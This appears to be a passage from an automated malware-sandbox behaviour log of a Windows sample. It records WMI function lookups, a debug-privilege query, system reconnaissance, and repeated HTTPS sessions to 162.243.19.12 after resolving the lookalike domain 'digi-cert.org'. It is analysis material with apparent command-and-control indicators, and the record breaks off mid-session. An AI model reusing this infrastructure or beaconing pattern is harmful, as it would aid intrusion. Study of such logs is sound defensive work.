Get Address Unknown module name function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0 True 1
Get Address Unknown module name function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0 True 1
Get Address Unknown module name function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10 True 1
Get Address Unknown module name function = QualifierSet_Next, address_out = 0x7ffbf68f2b20 True 1
Get Address Unknown module name function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70 True 1
Get Address Unknown module name function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50 True 1
Get Address Unknown module name function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060 True 1
Get Address Unknown module name function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760 True 1
Get Address Unknown module name function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0 True 1
Get Address Unknown module name function = ExecQueryWmi, address_out = 0x7ffbf68f1a20 True 1
Get Address Unknown module name function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90 True 1
Get Address Unknown module name function = PutInstanceWmi, address_out = 0x7ffbf68f1d00 True 1
Get Address Unknown module name function = PutClassWmi, address_out = 0x7ffbf68f1e00 True 1
Get Address Unknown module name function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00 True 1
Get Address Unknown module name function = ConnectServerWmi, address_out = 0x7ffbf68f34c0 True 1
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 False 1
Map Global\netfxcustomperfcounters.1.0.net clr networking process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE True 1
User (1)
Operation Additional Information Success Count
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (48)
Operation Additional Information Success Count
Open Certificate Store encoding_type = 65537, flags = 8708 True 17
Open Certificate Store encoding_type = 65537, flags = 8708 True 15
Get Computer Name result_out = X2VS1CUM True 3
Get Time type = Local Time, time = 2018-06-26 23:00:06 (Local Time) True 1
Get Time type = Ticks, time = 190843 True 1
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Get Info type = Operating System True 1
Get Info type = Operating System True 7
Get Info type = Hardware Information True 1
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Mutex (20)
Operation Additional Information Success Count
Create mutex_name = Global\.net clr networking True 10
Release mutex_name = Global\.net clr networking True 10
Environment (105)
Operation Additional Information Success Count
Get Environment String name = JS_PROFILER False 1
Get Environment String name = MshEnableTrace False 100
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Get Environment String name = HOMEPATH, result_out = \Users\Nd9E1FYi True 1
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Network Behavior
DNS (5)
Operation Additional Information Success Count
Resolve Name host = digi-cert.org, address_out = 162.243.19.12 True 5
TCP Sessions (16)
Information Value
Total Data Sent 5.75 KB
Total Data Received 28.70 KB
Contacted Host Count 1
Contacted Hosts 162.243.19.12:443
TCP Session #1
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Send flags = NO_FLAG_SET, size_out = 272 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Close type = SOCK_STREAM True 1
TCP Sessions #2, #3 and #4
Identical to TCP Session #1 in every recorded field: handle 0x7d0, AF_INET / SOCK_STREAM / IPPROTO_TCP, remote 162.243.19.12:443, local 0.0.0.0:49714, 333 bytes sent, 1.57 KB received, and the same Create, Connect, Send 333, Receive 5/49/5/1/5/48, Send 272, Receive 5/1488, Close sequence.
TCP Session #5
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 680 bytes
Data Received 3.68 KB
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 61, size_out = 61 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 1575, size_out = 1575 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 218, size_out = 218 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Close type = SOCK_STREAM True 1
TCP Session #6
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #7
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.60 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 272, size_out = 272 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1248, size_out = 1248 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #8
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 546 bytes
Data Received 3.03 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #9
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #10
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #11
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #12
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #13
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #14
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #15
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #16
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data